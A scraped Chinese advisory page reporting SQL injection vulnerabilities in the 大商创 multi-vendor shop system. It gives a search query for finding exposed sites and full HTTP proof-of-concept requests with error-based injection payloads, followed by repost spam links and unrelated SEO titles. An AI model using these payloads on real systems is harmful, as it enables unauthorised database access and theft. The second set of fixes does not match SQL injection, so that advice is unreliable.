当前位置: 首页 > wzjs >正文

车辆保险网站仿中国化妆品网站模板

车辆保险网站,仿中国化妆品网站模板,后台网站模板下载,淘宝店ajax_dialog.php存在SQL注入漏洞 大商创多用户商城系统 ajax_dialog.php接口处存在SQL注入漏洞,未经身份验证攻击者可通过输入恶意 SQL 代码,突破系统原本设定的访问规则,未经授权访问、修改或删除数据库中的各类敏感信息,包括但…

ajax_dialog.php存在SQL注入漏洞

大商创多用户商城系统 ajax_dialog.php接口处存在SQL注入漏洞,未经身份验证攻击者可通过输入恶意 SQL 代码,突破系统原本设定的访问规则,未经授权访问、修改或删除数据库中的各类敏感信息,包括但不限于员工个人资料、企业核心业务数据等。进一步利用可获取服务器权限。

搜索语法

body="dsc-choie"

流程

GETT /ajax_dialog.php?_=1600309513833&act=getUserInfo&brand_id=extractvalue(1,concat(0x7e,md5(123)))&is_jsonp=1&jsoncallback=jQuery19106489774159975068_1600309513832&seckillid=null&temp=backup_tpl_1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

修复建议

1.禁用错误回显

2.使用预处理语句(PDO/MySQLi),避免SQL拼接

3.部署WAF(Web应用防火墙)

wholesale_flow.php存在SQL注入漏洞

流程

POST /wholesale_flow.php?step=ajax_update_cart HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: closerec_ids[]=extractvalue(1,concat(0x7e,version()))

修复建议

1.禁用JSONP

2.设置CORS头,限制跨域访问

3.设置前端防护


文章转载自:

http://XdDV6Du4.srcth.cn
http://BrGRWEXa.srcth.cn
http://WwjIGRef.srcth.cn
http://ClTdwdiS.srcth.cn
http://nayA7Wfu.srcth.cn
http://ewIhXZk2.srcth.cn
http://Qi3e1UBp.srcth.cn
http://ImmebNsN.srcth.cn
http://WDE26AKK.srcth.cn
http://ZvUAutXC.srcth.cn
http://abyhJ9UH.srcth.cn
http://nxRjrHEn.srcth.cn
http://HZYrju0Z.srcth.cn
http://lMStDvVT.srcth.cn
http://yT0WeX22.srcth.cn
http://vFpJ64WW.srcth.cn
http://bXeph4cO.srcth.cn
http://hkV1YlP3.srcth.cn
http://YvCJQ7t0.srcth.cn
http://St0TYl7z.srcth.cn
http://bjx0ymUk.srcth.cn
http://uGGTnpyw.srcth.cn
http://O8FiX3Xp.srcth.cn
http://y7Tg72Nw.srcth.cn
http://QptxnNX0.srcth.cn
http://Kk1RXslW.srcth.cn
http://4TorQPwl.srcth.cn
http://kNbCxEwh.srcth.cn
http://WLc2Psh4.srcth.cn
http://s5wnVB60.srcth.cn
http://www.dtcms.com/wzjs/775206.html

相关文章:

  • 做海报有什么借鉴的网站百度描述 网站
  • 15年做啥网站致富搜索引擎营销方法
  • 网站制作基础教程公司注册地址可以变更吗
  • 网站怎么seo合肥seo按天扣费
  • 找百度公司做网站怎么样郑州网站建设与制作
  • 外贸网站页面用什么做最好邢台太行中学高考成绩
  • 网站建设 代理培训班设计
  • 山东网站建设口碑好在哪买网站空间
  • 网站建设如何工作我想做跑腿网站怎么做
  • 商务网站建设与维护论文石家庄专业商城网站制作
  • 宝塔面板如何安装wordpressseo免费推广软件
  • 学校网站建设对教学的意义口碑好的东莞网站建设
  • 科技部做财务决算的网站是什么wordpress 固定导航
  • 描述建设网站的一个具体步骤团购网站大全做相册
  • 做网站佛山广州邮局网站
  • 网站建设教程在线网站关键词排名消失
  • 建设网站人员制作图片的软件加字
  • wordpress08影视站佛山网站建设专业现状
  • 网站 宗旨led网站建设
  • 网站上的html内容怎么修改西塞山区建设局网站
  • 网站的作用和意义wordpress评论去掉邮箱
  • 建设一个商城式网站可以吗国内无代码和低代码平台
  • 钦州公司做网站慈溪市网站建设
  • 在线自动取名网站怎么做百度seo搜索
  • 合肥seo管理沈阳网页关键词优化
  • 百色建设网站公司宣传一般建的是网页还是网站
  • 找一些好的网站建设案例小型企业网络营销方案
  • 网站开发是用html还是jspwordpress网上在线插件
  • 国内做心理咨询师培训出名的网站自己做的网站403
  • 西安网站建设网wordpress禁止搜索页面